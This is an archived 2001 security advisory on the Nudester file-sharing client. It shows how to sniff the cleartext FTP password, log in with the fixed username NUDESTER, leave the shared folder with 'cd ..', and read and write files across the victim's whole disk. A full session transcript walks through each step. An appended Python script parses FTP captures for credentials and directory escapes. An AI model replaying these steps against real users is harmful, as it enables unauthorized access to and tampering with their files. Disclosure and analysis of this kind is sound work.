<------------------------->
[Real Security Advisory #1]
[ Author: Cyph3r ]
[ www.Real-Security.org ]
[ Date: 08/16/2001 ]
<------------------------->
[Vulnerable: ]
[Nudester 1.10 (and below?)]
[ OS: Win9x/ME/2k/NT/XP ]
[ Site: www.nudester.org ]
<------------------------->

-> Severity:
Malicious users can gain full read and write access (upload/download) to a Nudester user's files, not just the shared folder.

-> Overview:
Nudester, a file-sharing program for porn, uses the FTP protocol to transfer files. The problem is that the embedded FTP server (banner "ICS FTP Server") does not confine the session to the shared folder: it gives access to the whole hard disk instead of just the folder containing porn. Two things combine to make this exploitable by anyone on the network path: the username is the fixed value NUDESTER for every install, and the per-user password is sent in cleartext on port 21, so it can be sniffed during any download and replayed with an ordinary FTP client.

Example:
Open Nudester and a sniffer program, e.g. Iris (www.eeye.com), and download a file from a user on Nudester while the sniffer is running with a filter on port 21, so you capture the password:

<Sniffed Data>
220 ICS FTP Server ready
user NUDESTER
331 Password required for NUDESTER
pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
230 User NUDESTER logged in
</Sniffed Data>

Open an FTP client and connect to the user's IP with the sniffed credentials:

ftp> open ***.***.***.***
Connected to ***.***.***.***
220 ICS FTP Server ready.
User (***.***.***.***:(none)): NUDESTER
331 Password required for NUDESTER.
Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
230 User NUDESTER logged in.

- Bingo!

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
C:\TEMP\*.* not found
226 File sent ok
ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.

The session starts in C:\TEMP (empty here), but "cd .." is not refused and lands in the drive root:

ftp> cd ..
250 CWD command successful. "C:/" is current directory.
ftp> DIR
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 1152 Oct 30 2000 FRUNLOG.TXT
-rwxrwxrwx 1 ftp ftp 25473 May 15 1998 MSCDEX.EXE
-rw-rw-rw- 1 ftp ftp 10604 May 15 1997 CDROM.SYS
-rwxrwxrwx 1 ftp ftp 20135 May 15 1998 KEYB.COM
-rw-rw-rw- 1 ftp ftp 34566 May 15 1998 KEYBOARD.SYS
-rwxrwxrwx 1 ftp ftp 71102 May 15 1998 EDIT.COM
-rw-rw-rw- 1 ftp ftp 38 Oct 16 1998 AUTOEXEC.OLD
-rw-rw-rw- 1 ftp ftp 31 Oct 16 1998 CONFIG.OLD
drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 ATI
-rw-rw-rw- 1 ftp ftp 121 Oct 29 2000 CONFIG.DOS
-rw-rw-rw- 1 ftp ftp 113 Oct 29 2000 AUTOEXEC.DOS
-rw-rw-rw- 1 ftp ftp 436 Nov 18 2000 AUTOEXEC.BAK
drw-rw-rw- 1 ftp ftp 0 Oct 29 2000 WINDOWS
drw-rw-rw- 1 ftp ftp 0 Oct 30 2000 WINDOWS.000
-rw-rw-rw- 1 ftp ftp 7471 Nov 18 2000 NETLOG.TXT
-rw-rw-rw- 1 ftp ftp 172 Nov 15 2000 CONFIG.BAK
-rw-rw-rw- 1 ftp ftp 5048 Nov 17 2000 SETUPXLG.TXT
-rwxrwxrwx 1 ftp ftp 438 Aug 16 00:43 AUTOEXEC.BAT
dr--r--r-- 1 ftp ftp 0 Oct 29 2000 Program Files
-rw-rw-rw- 1 ftp ftp 172 Nov 18 2000 CONFIG.SYS
-rw-rw-rw- 1 ftp ftp 19622 Aug 10 18:50 SCANDISK.LOG
-rw-rw-rw- 1 ftp ftp 327 Oct 30 2030 outreg.txt
-rw-rw-rw- 1 ftp ftp 339 Oct 30 2030 outreg.ini
drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 dcpt
-rwxrwxrwx 1 ftp ftp 17129 Oct 30 2030 BOOTDISK.EXE
-rwxrwxrwx 1 ftp ftp 2884286 Oct 30 2030 DECOMP.EXE
-rwxrwxrwx 1 ftp ftp 265420 Oct 30 2030 DOS4GW.EXE
-rw-rw-rw- 1 ftp ftp 507 Oct 30 2030 FILE_ID.DIZ
-rw-rw-rw- 1 ftp ftp 2086 Oct 30 2030 HELPME.DOC
-rw-rw-rw- 1 ftp ftp 3639 Oct 30 2030 LICENSE.DOC
-rw-rw-rw- 1 ftp ftp 1377 Oct 30 2030 ORDER.DOC
drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 KPCMS
-rw-rw-rw- 1 ftp ftp 386 Nov 02 2000 AUTOEXEC.001
drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 psfonts
-rw-rw-rw- 1 ftp ftp 25 Nov 03 2000 prompt
-rwxrwxrwx 1 ftp ftp 95874 May 05 1999 COMMAND.COM
drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Winzip
drw-rw-rw- 1 ftp ftp 0 Dec 10 2000 unzipped
drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Antivirus
drw-rw-rw- 1 ftp ftp 0 Dec 16 2000 My Music
-rw-rw-rw- 1 ftp ftp 118 Jan 20 00:27 netsig.txt
drw-rw-rw- 1 ftp ftp 0 Mar 15 21:05 accelerator
-rw-rw-rw- 1 ftp ftp 22721 Aug 17 01:00 winzip.log
226 File sent ok
ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.

- Let's see if we have access to download a file:

ftp> get netsig.txt
200 Port command successful.
150 Opening data connection for netsig.txt.
226 File sent ok
ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.

- Yep. Let's try to upload a file:

ftp> put c:\temp.txt
200 Port command successful.
150 Opening data connection for TEMP.TXT.
226 File received ok

Both succeed from the drive root, so the attacker can read any file on the disk and write files anywhere, including into the Windows directory.

-> Conclusion:
Anyone can gain full access to a Nudester user's files. The username (NUDESTER) is the same for every user, but the password is not, so you have to sniff port 21 while downloading a file from the target to retrieve it. The only solution to this problem is not to use Nudester.

-> Credits:
Cyph3r - Cyph3rat_private

-> Greets:
Pseudo, lice_, Electro, Deleted, Venomous, c0redump, acid, spasms, trew, zeronine, matt, shizniz, z0mb1e b0b, neonfreon, dragnet, c0de, spiked and anyone else I missed.
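As an added example (not part of the original advisory, and not Nudester's or eEye's code), the script below runs over a captured FTP control-channel dialog and pulls out the three facts the advisory relies on: the cleartext USER/PASS pair, any working directory the server reports that lies outside the intended share, and the transfers the server completed. The capture is constructed to mirror the exchange quoted above; the password is a placeholder, and C:\TEMP as the share root is an assumption drawn from the first "dir" output.

```python
"""Analyze a captured FTP control channel (port 21) for cleartext credentials,
directory escapes outside an expected share root, and completed transfers."""
import re
from typing import List, Optional, Tuple

# Constructed sample, modelled on the exchange quoted in the advisory (not a real
# capture). "C" = client->server, "S" = server->client. Password is a placeholder.
SAMPLE_CAPTURE: List[Tuple[str, str]] = [
    ("S", "220 ICS FTP Server ready"),
    ("C", "USER NUDESTER"),
    ("S", "331 Password required for NUDESTER"),
    ("C", "PASS example-placeholder-password"),
    ("S", "230 User NUDESTER logged in"),
    ("C", "PWD"),
    ("S", '257 "C:/TEMP" is current directory.'),
    ("C", "CWD .."),
    ("S", '250 CWD command successful. "C:/" is current directory.'),
    ("C", "RETR netsig.txt"),
    ("S", "150 Opening data connection for netsig.txt."),
    ("S", "226 File sent ok"),
    ("C", "STOR TEMP.TXT"),
    ("S", "150 Opening data connection for TEMP.TXT."),
    ("S", "226 File received ok"),
]

# Assumed share root: the directory a Nudester session is supposed to stay inside.
ASSUMED_SHARE_ROOT = "C:\\TEMP"

_QUOTED_PATH = re.compile(r'"([^"]*)"')


def _norm(path: str) -> str:
    """Normalize a Windows-style path for comparison: forward slashes, upper case,
    no trailing slash (so the drive root 'C:/' becomes 'C:')."""
    return path.replace("\\", "/").upper().rstrip("/")


def extract_credentials(capture) -> List[Tuple[str, str, bool]]:
    """Return (user, password, accepted) for each login attempt. FTP sends both in
    cleartext, so a passive observer on port 21 sees exactly what the server sees."""
    found = []
    user: Optional[str] = None
    password: Optional[str] = None
    for direction, line in capture:
        verb, _, arg = line.partition(" ")
        if direction == "C" and verb.upper() == "USER":
            user, password = arg, None
        elif direction == "C" and verb.upper() == "PASS":
            password = arg
        elif direction == "S" and user is not None and password is not None:
            # The first server reply after PASS is the verdict (230 = logged in).
            found.append((user, password, verb.startswith("2")))
            user = password = None
    return found


def find_escapes(capture, share_root: str) -> List[str]:
    """Return every working directory the server reported (250/257 replies) that
    lies outside share_root. A non-empty result means the session is not confined."""
    root = _norm(share_root)
    outside = []
    for direction, line in capture:
        if direction != "S" or line[:3] not in ("250", "257"):
            continue
        match = _QUOTED_PATH.search(line)
        if match and not (_norm(match.group(1)) + "/").startswith(root + "/"):
            outside.append(match.group(1))
    return outside


def find_transfers(capture) -> List[Tuple[str, str]]:
    """Return (verb, filename) for each RETR/STOR the server completed with 226."""
    done = []
    pending: Optional[Tuple[str, str]] = None
    for direction, line in capture:
        verb, _, arg = line.partition(" ")
        if direction == "C" and verb.upper() in ("RETR", "STOR"):
            pending = (verb.upper(), arg)
        elif direction == "S" and pending is not None:
            if verb == "226":
                done.append(pending)
                pending = None
            elif verb[:1] in ("4", "5"):  # transfer refused or failed
                pending = None
    return done


def report(capture, share_root: str) -> dict:
    """Summarize the three findings for one capture."""
    return {
        "credentials": extract_credentials(capture),
        "escapes": find_escapes(capture, share_root),
        "transfers": find_transfers(capture),
    }


if __name__ == "__main__":
    for key, value in report(SAMPLE_CAPTURE, ASSUMED_SHARE_ROOT).items():
        print(f"{key}: {value}")
```

The same three checks apply to any FTP server, not only this one: run the analyzer over a real port-21 capture (one tuple per control-channel line, tagged by direction) and a non-empty "escapes" list confirms the server does not restrict the session to its share, while a non-empty "credentials" list is the reminder that plain FTP leaks the login to anyone on the path regardless of how strong the password looks.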
This archive was generated by hypermail 2b30 : Fri Aug 17 2001 - 07:35:53 PDT